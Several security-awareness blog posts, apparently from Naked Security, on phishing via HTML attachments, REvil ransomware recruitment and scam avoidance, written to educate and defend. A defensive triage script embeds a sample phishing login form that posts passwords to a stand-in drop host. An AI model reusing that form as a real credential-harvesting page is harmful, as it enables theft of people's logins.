
If you connect it, protect it

“If you connect it, protect it” is a short and simple slogan that we’ve taken straight from this year’s Cybersecurity Awareness Month (CSAM).

We wrote about CSAM last week, on the first of the month, to explain why we think CSAM is still worth supporting, for two main reasons.

The first reason is that it’s an annual prod to all of us to reach out to our friends and family who still think that “it’ll never happen to me”, or that “I’m too unimportant for the crooks to go after my data.”

The thing is, as we explained last week, that the crooks don’t have to “go after you” to get hold of your data.

After all, they might get hold of it, along with personal information about thousands or even millions of other people, as the side-effect of a blunder by a company that didn’t protect its customers’ data well enough.

And if they do get hold of any PII (personally identifiable information), there’s very little to stop them using it against you right away, or from passing it on as a “data dump” to other crooks to use for nefarious purposes.

Many cybercrimes that are dubbed targeted attacks happen the other way round from the way most people imagine them.

Simply put, sometimes the crooks come after you because you happen to be the next person on their list, not because they chose specifically to dig into your affairs in order to get you onto the list.

The second reason to support CSAM is that it’s a handy reminder to review all the cybersecurity precautions that you’ve already taken, or think you’re taking, to make sure that they’re actually working as you intended.

For example, wherever you’ve turned on automatic updating, why not take the time to go and review all your recent updates?

If you’ve been making regular backups throughout the year, do you still know how to mount and restore them safely and quickly if the need arises?

How about all those home devices you’ve installed recently, from internet-enabled doorbells to smart electricity meters and home thermostats?

For example, you may have enabled data collection features (what’s known as telemetry in the jargon) that you thought would be useful and that you’d use regularly, but that you haven’t used at all and therefore might as well turn off.

What to do?

You can use CSAM, which gets enough publicity that you are unlikely to miss it even if you don’t put it in your own diary, as an incentive to do all of the following:

  • Make sure your own cybersecurity precautions are up to scratch. Best-practice advice may have moved on since last year, so take the opportunity to go and check if last year’s precautions are still considered good enough, or whether you ought to make any useful improvements.
  • Make sure your own cybersecurity precautions are working as you intended. Don’t just assume that your router has the latest firmware or that your Java Runtime Environment is up to date. Go and take a look and mark it off your list.
  • Make sure your own cybersecurity precautions are a good example to others. For instance, if your website still doesn’t have a TLS certificate, go and get one; if you’ve been putting off adopting 2FA or updating your passwords from secret99, go and do it now.

Remember: if you connect it, whether it’s a computer, an IoT device or an online account, protect it!

Even if you don’t think it’s necessary for “little old you”, please do it for the rest of us, because cyberinsecurity on your part affects everyone else, too.

Oh, and do it because friends don’t let friends get scammed.


Serious Security: Phishing without links – when phishers bring along their own web pages

In the past few days we received two phishing campaigns – one sent in by a thoughtful reader and the other spammed directly to us – that we thought would tell a useful visual story.

As far as we can tell, these scams originated from two different criminal gangs, operating independently, but they used a similar trick that’s worth knowing about.

The phishing scammer’s three-step

Most straight-up email phishing scams – and you’ve probably received hundreds or even thousands of them yourself in recent times – use a three-stage process:

  • Step 1. An email that contains a URL to click through to.

The message might claim to be telling you about an unpaid electricity bill, an undelivered courier item, a suspicious login to your online banking account, a special offer you mustn’t miss, or any of a wide range of other believable ruses.

Sometimes the crooks actually know your name and perhaps even your phone number and your address.

Sometimes the criminals are flying blind and stick to phrases such as “Dear Customer”, “Dear Sir/Madam” or even just “Hello.”

Sometimes they know the name of your electricity provider or bank; sometimes they don’t know but happen to guess correctly; sometimes they fudge the issue by writing some generic text that’s just enough to get your interest.

The email message doesn’t have to say a lot – all it needs to do is catch you at a weak moment so you click the link.

Clicking a phishing link ought to be safe enough on its own, provided you’re careful about what happens next, but it inevitably takes you one step closer to trouble.

  • Step 2. A web page where you need to login to go further.

Usually, after you’ve clicked through, there’s a password page, and often it’s a surprisingly good clone of the real thing, created simply by pirating the HTML, images, fonts, stylesheets and JavaScript from the genuine site and installing it somewhere else.

The imposter pages will often be sitting on a legitimate website that’s been hacked to act as a believable springboard for the attack.

Unpatched blogging sites are popular to hack because the crooks can often find somewhere perfectly innocent-looking and unlikely to be noticed, deep in the directory structure of the real site where a few extra images and HTML files won’t attract the attention of the site’s legitimate operator.

Or the imposter pages may be part of a short-lived web hosting account – perhaps set up just a day or two before as a “free trial” that will probably be shut down quickly, but not before the crooks will have cut and run anyway.

  • Step 3. A web site where the data you put into the login form gets sent.

Sometimes the stolen data will be uploaded to a “drop site” on the same server used in (2); sometimes the crooks use a third site that may be collecting data from several different phishing campaigns at the same time.

Technically speaking, the clickable link to site (2) appears inside email (1) as what’s known as a hyperlink, encoded into HTML using a so-called anchor tag, written as <A ...>, like this:

The text between the <A> and the </A> usually appears in your browser in blue to denote you can click it to follow a hyperlink jump to somewhere else.

But the clickable text itself isn’t where you go next.

The target of the link, often a URL pointing to another website, is given by the HREF=... value that appears along with the <A>:

(If you want to use the right jargon, you need to know that the <A> part is known as a tag, for which </A> is the matching closing tag. The HREF=... part is referred to as an attribute of the tag.)

Finding the password stealer

Usually, the fake login form that performs the password-stealing part of a phishing scam appears somewhere in the phoney web page on website (2).

So, if you ever need to go looking for the bogus login form, you’ll generally find it on site (2), which, as we just explained, is generally referenced by an HREF=... attribute in email (1).

This time, you’re looking for an HTML tag called <FORM>, and instead of using an HREF=... to denote the URL they’re linked to, form tags have an attribute called ACTION=... that tells your browser where to upload the completed form when you finish:

The button that finishes off your data entry and confirms you want to upload the data you just entered is denoted inside the form by an <INPUT> tag with an attribute that says TYPE="submit", as in the example above.

You might expect that hovering your mouse over the submit button in a form would pop up a preview of where your data is going next, in the same way that it does when you hover over a hyperlink, but sadly no browser we know of does this:

Cutting out the middleman

The phishes that we mentioned at the start, one received directly by us and one kindly reported by a reader, worked on the three-step principle we’ve just described.

But there was one important difference.

Step (2), the cloned website with a phoney login page on it, wasn’t reached by clicking a link in the email.

Instead, the bogus web page was brought along for the ride as an HTML attachment, like this:

Opening the attachment doesn’t feel terribly dangerous – after all, it’s not a document that could contain macros and it’s not a PowerShell file or an executable program that could wreak instant havoc.

In theory, opening an HTML attachment should simply open up the enclosed web page in the comparative safety of your browser’s sandbox, as if you had clicked a link.

Like this:

When you open an HTML attachment like this, instead of clicking a conventional web link, there are two huge differences:

  • There is no link in the email that you could have checked out in advance to look for a fake or suspicious domain name.
  • The URL in the address bar is a harmless-looking local filename, with no website name or HTTPS certificate you can examine for signs of bogosity.

There are other reasons not to open HTML attachments, notably to do with JavaScript.

For safety’s sake, script code inside HTML emails is stripped or blocked when any modern email reader displays the message. That’s a precaution that email software introduced decades ago, when self-spreading script viruses such as Kakworm literally spread everywhere: Kakworm’s script code would activate and the virus would spread as soon as the email was displayed, without waiting for you to click any further.

When you open an HTML attachment, however, it is no longer under the strict controls of your email client software, and any JavaScript inside the HTML will be allowed to run by default by your browser.

Here’s another example, this time pretending to be a payment processed by SWIFT, a well-known international messaging network for financial transactions. (International bank identification codes, now officially called BICs, are still widely known as SWIFT codes.)

Of course, neither Microsoft nor SWIFT had anything to do with this email, and there isn’t any payment you need to know about.

The message is just a ruse to make you wonder what’s going on here, and opening the attachment brings up a fake login page designed to phish your password:

The innocent address bar

With no clickable link to give the game away, the browser’s address bar is the obvious place where you’d look to try to verify the web page you just landed on.

As you can see above, the website details that show up for HTML attachments opened locally are just local URLs, starting with file:// instead of http:// or https://.

There’s no encryption to look for, and no TLS certificate you can check, because all you’re really doing is browsing a local temporary file.

In our case, they had names that are unexceptionable enough that we didn’t even bother to redact them in the images above:

file:///tmp/mozilla/Proforma Invoice.html
file:///tmp/mozilla/Payment 66603635.html

The URLs above are what we saw when we ran our test using a Linux email client and with the Firefox browser, but the results are similar on other platforms.

On Windows, for example, you’ll see something like this:

Tracking the FORM data

As explained above, filling in the forms in the fake HTML pages above will send off your password to websites controlled by the criminals.

Of course, email passwords are amongst the most valuable credentials for crooks to acquire, simply because many people use their email account for password resets on a multitude of other accounts.

So, criminals with control over your email account can probably wrest control of many of your other accounts, too, because any password reset emails will end up where the crooks can access them before you even realise that they’re taking over your digital life.

But how to check where a form in a web page will send your data when you submit it?

Unfortunately, we don’t know of any easy way that’s built in to any browser, but you can use your browser’s Developer Tools to do the trick.

In Edge, for example, pressing F12 and choosing the Elements tab will show you a visual view of the HTML structure of the web page:

Searching for the text ACTION (the search doesn’t care whether it’s upper or lower case) should reveal any URLs associated with forms on the page, as you see here:

We’ve redacted the URL here, but we will say that it very obviously had nothing to do with any Microsoft product or service, and immediately outed the login form as fraudulent.

In Firefox, the process is similar: Ctrl-Shift-I will bring up Mozilla’s Inspector toolbox.

Choose the Inspector tab and search for ACTION, and you should be able to track down the URLs used for data upload by any of the forms in the page:

In Safari on a Mac, the key combination to bring up the Web Inspector is Option-Command-I (you may first need to turn on the Develop menu in Safari’s Advanced preferences), after which a search will show you any occurrences of ACTION in the HTML source of the page:
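The hyperlink and form anatomy described earlier, and the developer-tools search for ACTION just described, can both be done offline before the attachment ever reaches a browser. The following Python script is an added example, not code from the original article: it parses an HTML attachment with the standard library, reports every <A> whose visible text names one site while its HREF goes to another, every <FORM> whose ACTION sends the typed-in data to a network host, and the number of inline <SCRIPT> blocks that would run if the file were opened. The sample attachment, the file:// base path and the hosts in it (a documentation-range IP and example.net) are constructed for the demonstration.

```python
"""Offline triage of an HTML email attachment.

Added example (not from the original article): it reports what the
developer-tools search for ACTION shows you by hand, plus the link targets
and inline scripts, without ever opening the file in a browser.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Where a locally opened attachment appears to live (a file:// URL, as in the article).
LOCAL_BASE = "file:///tmp/mozilla/attachment.html"

# Constructed sample (assumption, not a real phish): a cloned login page whose
# visible link text names Microsoft's real login host, whose <a> really goes to
# a documentation-range IP, and whose <form> posts to a third-party drop site.
SAMPLE_ATTACHMENT = """<html><head><title>Sign in to your account</title>
<script>document.title = "Sign in";</script></head><body>
<p>Your session expired. Sign in again at
<a href="http://198.51.100.7/login/">https://login.microsoftonline.com/</a></p>
<form action="https://drop.example.net/post.php" method="post">
  <input type="email" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form></body></html>"""


class PhishTriage(HTMLParser):
    """Collect <a href> targets, <form action> targets and <script> counts."""

    def __init__(self):
        super().__init__()
        self.links = []        # (visible text, href) per <a>
        self.forms = []        # {"action", "method", "fields"} per <form>
        self.scripts = 0       # number of inline <script> blocks
        self._href = None      # href of the <a> currently open, else None
        self._text = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            self._href, self._text = attrs.get("href") or "", []
        elif tag == "form":
            self._form = {"action": attrs.get("action") or "",
                          "method": (attrs.get("method") or "get").lower(),
                          "fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["fields"].append(((attrs.get("type") or "text").lower(),
                                         attrs.get("name") or ""))
        elif tag == "script":
            self.scripts += 1

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None
        elif tag == "form":
            self._form = None

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)


def host_of(url):
    """Hostname of an absolute URL, or "" for relative, local or non-URL text."""
    return (urlparse(url).hostname or "").lower()


def triage(html, base=LOCAL_BASE):
    """Summarise where the page's links and forms really lead.

    base is the URL the page was opened from: the file:// path for an
    attachment, or the hacked site's URL for a page fetched from the web, so
    that relative ACTION targets resolve the way the browser would resolve them.
    """
    parser = PhishTriage()
    parser.feed(html)
    parser.close()
    report = {"deceptive_links": [], "exfil_forms": [], "scripts": parser.scripts}
    for text, href in parser.links:
        shown, real = host_of(text), host_of(urljoin(base, href))
        if shown and shown != real:       # text looks like one site, goes to another
            report["deceptive_links"].append((shown, real))
    for form in parser.forms:
        host = host_of(urljoin(base, form["action"]))
        if host:                          # submitted data leaves for a network host
            fields = [name for kind, name in form["fields"] if kind != "submit" and name]
            report["exfil_forms"].append((host, form["method"], fields))
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

Save the attachment to disk without opening it, read it into a string and call triage() on it. For a phishing page fetched from a hacked website rather than an attachment, pass that page’s URL as base so that a relative ACTION such as /wp-content/post.php resolves to the hacked host, which is exactly where the browser would send your password.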

What to do?

The good news is that you don’t need to learn a whole new set of precautions to protect yourself from bring-your-own-webpage phishing scams.

Here’s what to do:

  • Avoid HTM or HTML attachments altogether unless they’re from someone you know and you are expecting them. We can’t recall ever receiving an emailed-in web page that wasn’t trying to trick us.
  • Avoid logging in on web pages that you arrived at from an email, whether you clicked on a series of links or opened an attachment to get there. If it’s a service you already know how to use – whether it’s your email, your banking site, your blog pages or a social media account – learn how to reach the login page directly. If you always find your own way to your account login pages, you’ll never be tempted by fakes.
  • Turn on 2FA if you can. Two-factor authentication means that you need a one-time login code, usually texted to your phone or generated by a special app, that changes every time. 2FA doesn’t guarantee to keep the crooks out, but it makes your password alone much less use to them if they do manage to phish it.
  • Change passwords at once if you think you just got phished. The sooner you change your current password after putting it into a site you subsequently suspect, the less time the crooks have to try it out. Similarly, if you get as far as a “pay page” where you enter payment card data and then realise it’s a scam, call your bank’s fraud reporting number at once. (Look on the back of your actual card so you get the right phone number.)
  • Use a web filter. A good anti-virus solution (Sophos Home is free for Windows and Mac) won’t just scan incoming content to stop bad stuff such as malware getting in, but will also check outbound web requests to stop good stuff such as passwords getting out. Even in “clickless” attacks like this, the password exfiltration relies on an outgoing web connection that a web filter could block.

#BeCyberSmart – why friends don’t let friends get scammed

Cybersecurity is important.

In fact, it was already important way back in the years before cybercriminals started making money out of malevolent software – before we needed terminology such as phishing, botnets, attack chains, exploit kits, spyware and ransomware.

Back when computer viruses were almost entirely about showing off to imaginary chums, or having a destructive joke at everyone else’s expense on Friday the Thirteenth by deleting their programs one by one…

…well, even back then, cybercrime (as we unexceptionably call it now) was neither witty nor innocent.

Then, starting in about 2000 or 2001, cybercrooks figured out not only how to spread mayhem with malware, but also how to make money illegally, too.

Lots of money. Lots and lots and lots of money.

At the start of the 2000s, crooks were scamming $100 a time with popups for fake charities to which you’d send money for bogus good causes; by the end of the decade they were stealing payment card numbers and helping themselves directly to $1000 or more at a time; in 2020 they’re into blackmail in a big way by stealing or scrambling your data and extorting you into buying it back for $1,000,000 a time.

The worst of it is that cybercrime directly affects all of us.

No matter how unimportant we might feel in the digital economy, or how little we think we might have for cybercrooks to take, we all have data that’s worth something to cybercrooks – and there are whole swathes of the cyberunderground getting wealthy at our expense just by stealing data to sell on to someone else.

Simply put: a cybersecurity injury to you can quickly turn into a cybersecurity injury to everyone else.

How to help

How can you help?

Well, one way is to support Cybersecurity Awareness Month, or CSAM for short, in your part of the world.

Yes, CSAM is getting on a bit – it’s now in its 17th year (it started in the US back in 2004), so you’ll find cynics who say, “But it’s just the same old tired advice recycled every year by people who can’t think of anything better to say.”

We disagree, because the basics are still important, and we still haven’t got them fully sorted out anyway.

Here’s what we said seven years ago to the day, when CSAM hit its tenth year:

Cybersecurity matters because there is a whole underweb of cybercriminals waiting to take money out of our economy if we give them half a chance.

So let’s make an effort to give them less than half a chance.

As we’ve said before, treat Cybersecurity Awareness Month as an incentive to change your digital lifestyle for the better, on a long term basis.

And that’s what we’re saying again.

Sure, some of what you hear in CSAM will be cute but basic phrases you’ve heard before, such as advice to “pick proper passwords”, encouragement to “stop – think – connect” before leaping onto websites and filling in personal data, and reminders that “if in doubt, don’t give it out.”

But even if you already do all of those things yourself all the time, what about your friends? Your family? Your colleagues?

Your attitude can help them improve their cybersecurity too, so our motto for CSAM 2020 is this: FRIENDS DON’T LET FRIENDS GET SCAMMED.

Or, in the words chosen for this year’s CSAM in the US, Do your part. #BeCyberSmart.

Because an injury to one is an injury to all.

REvil ransomware crew dangles $1,000,000 cybercrime carrot

Sadly, we’ve written many times before about RaaS, short for Ransomware-as-a-Service:

That’s where the crooks who actually write the ransomware keep themselves out of the limelight by hiring in other crooks to identify victims, get into their networks, spread the malware and trigger the damage:

The operators themselves then collect the ransom payments from a distance, squeezing the victims for payment using one or another form of mostly-anonymous cryptocurrency.

The spamming, phishing, scamming, hacking, malware unleashing and attacking part of the operation – the hands-on part, if you like – is left to a crew of affiliates.

Perhaps unsurprisingly, the crimeware-as-a-service ecosystem seems to have settled on the same sort of divide-the-spoils arithmetic used by Apple and Google in the App Store and the Play Store, perhaps simply because it’s a ratio that everyone is familiar with.

In general, each affiliate gets a 70% cut of the turnover they bring in themselves, while the operators keep 30% of everyone’s ill-gotten gains.

One of the well-known names in the RaaS scene is a gang known as REvil, and – worryingly for the rest of us – they’re hiring, allegedly “depositing” $1m up front into the payment pot of an underground hacking forum as an incentive to attract new partners-in-crime.

As security researcher @Raj_Samani tweeted earlier today:

 Thus we: 1. Expand the composition of the teams of acting advertisers with talented people; 2. We invite ready-made lineups to work with us; All this is aimed at one thing - to increase the quality and quantity of waste material, which entails an increase in profits. But this does not mean that everyone will be accepted. For your peace of mind and confidence, we have made a deposit of 1 million US dollars.

As we’ll explain below, the curiously mangled phrase “to increase the quality and quantity of waste material” doesn’t just refer to the ruined files that a ransomware attack leaves behind after they’ve been scrambled with a cryptographic key known only to the crooks.

It almost certainly also refers to the confidential files that the infiltrators now steal up front and threaten to dump in public to embarrass your company, to incite the wrath of your customers, or to leave you facing a regulatory enquiry.

Unless you pay up.

What skills do you need to apply?

As reported by security news site Bleeping Computer, the REvil crew are explicitly looking for:

 Teams that already have experience and skills in penetration testing, working with msf / cs / koadic, nas / tape, hyper-v and analogues of the listed software and devices.

In case you’re wondering, the first three abbreviations above refer to so-called grey hat tools – software products created for cybersecurity research and testing purposes but that are just as widely used for evil:

They’re sold or given away as legitimate security tools so you can see if your own network is secure, and then improve your protection if it isn’t.

As you can imagine, however, these same tools are of inestimable value to cybercriminals too, who use them to see if your network is secure, and then break in automatically if it isn’t.

  • MSF is Metasploit Framework, an automated attack-and-exploit toolkit available in free and paid versions.
  • CS stands for Cobalt Strike, a paid-only product that describes itself as offering “advanced threat tactics for penetration testers”. (As far as we know, the crooks don’t bother to pay for it, though we suspect they could easily afford it if they had to.)
  • Koadic is an open source penetration testing tool that is, by its own account, a “Windows post-exploitation rootkit”.

NAS (network attached storage) and tape, of course, are two popular backup technologies that today’s ransomware attackers try to identify on your network and wipe out in advance to make it harder for you to recover on your own.

And Hyper-V is Microsoft’s virtual machine (VM) software, commonly used on Windows networks to let powerful servers pretend to be multiple computers at the same time, allowing IT teams to scale their server workloads up and down as needed.

Typically, you can’t scramble the files that act as the virtual hard disks in use by each VM on a server because they’re in use and locked by the virtualisation software.

But if you can infiltrate the management tools that may be looking after dozens or hundreds of VMs at the same time, you can attack the VMs “from inside” just as if they were regular computers containing regular files.

Ironically, virtualisation tools are now being used by ransomware criminals themselves, with VMs sneakily fired up in which the crooks can run their ransomware without exposing its files or processes directly to the security scrutiny of the host computer that they’re about to attack:

What’s the backstory?

We wrote last year about the alleged end of an infamous ransomware-as-a-service group known as GandCrab – a shutdown occasioned, sadly, not by the arrest and conviction of the crooks but by their own claims that:

All the good things come to an end. […] Earnings with us per week averaged $2,500,000. We personally earned more than 150 million dollars per year. […] We are leaving for a well-deserved retirement.

However, even though the twisted history of ransomware groups can be hard to follow – at least for those that haven’t been caught and prosecuted – it looked right away as though the report of the gang’s demise was a scam all of its own, and that they almost immediately returned with a ransomware strain known as Sodinokibi.

Or, to use its other name, REvil:

Back then, Sodinokibi ransomware demands were running at about $2500 per computer, jumping to $5000 after four days.

How times change

As you probably know, extortion demands don’t really work like that any more.

Ransomware gangs, including the REvil crew, have taken to setting up attacks on one or just a few networks at a time, rather than trying to scramble thousands of computers individually in a widespread attack.

The attackers can then “negotiate”, if that is the right word, directly with the IT teams or the CISOs who look after the networks they do manage to breach, and if the criminals have locked up all the computers in one company at the same time, they have much more leverage.

As a result, they’re often demanding six-figure or even seven-figure sums each time.

(Less than two weeks ago we wrote about an attack by the Maze ransomware criminals where an astonishing eight-figure demand was made, with the crooks opening the bidding at $10,000,000. In that case, the victim refused to pay.)

As we mentioned above, ransomware attacks are now routinely preceded by a data-stealing binge by the attackers, so that victims are faced with two-pronged extortion demands.

These days, the criminals don’t just squeeze you to pay up for the decryption key to unscramble your whole network and get your business going again.

They also menace you to pay for their “co-operation” in deleting the data they stole instead of leaking it to the world, or auctioning it off to other crooks, or both.

It’s a bit like being kidnapped and blackmailed at the same time: even if you have a way out of one crisis, such as a recent and reliable backup to recover your own files, the crooks have a second hold over you.

Suddenly, and rather shockingly, that million-dollar “investment” by the REvil crew sounds like up-front money that the gang can easily afford and expect to recoup quickly, possibly even in a single well-planned attack.

What to do?

Instead of offering you a list of technical tips, we’re simply going to reiterate what our chums at Bleeping Computer already said.

Don’t pay.

If the worst should happen, do your very best not to get squeezed into paying up.

If you will afford us the chance to be upbeat about it, we’d like to repeat what we said earlier this month to encourage companies not to reach for the giant-sized chequebook straight after a ransomware attack:

 If you get hit by ransomware
 It means you've had a breach.
 The world might get judgmental
 And want to point and screech.
 But if, despite the blackmail threats,
 You tell the crooks, "Hell, no!"
 Then we give you a big, loud cheer
 And say to you, "Chapeau!"


Naked Security Live – “SMS scams: keep yourself and your family safe!”

We do a show on Facebook every week in our Naked Security Live video series, where we discuss one of the big security concerns of the week.

We’d love you to join in if you can – just keep an eye on the @NakedSecurity Twitter feed or check our Facebook page on Fridays to find out the time.

It’s usually about 18:00 UK time, which is early afternoon/late morning on the East/West coast of North America.

Note that you don’t need a Facebook account to watch our live streams, although you will need to login if you want to ask questions or post comments.

For those of you who [a] don’t use Facebook, [b] had buffering problems while we were live, [c] would like subtitles, or [d] simply want to catch up later, we also upload the recorded videos to our YouTube channel.

Here’s last week’s video, where we showed you how to keep yourself, and your friends and family, safe from phishing scams that arrive via SMS – what’s colloquially known as “smishing”:

[embedded content]

(Watch directly on YouTube if the video won’t play here.)

Thanks for watching… hope to see you online later this week!

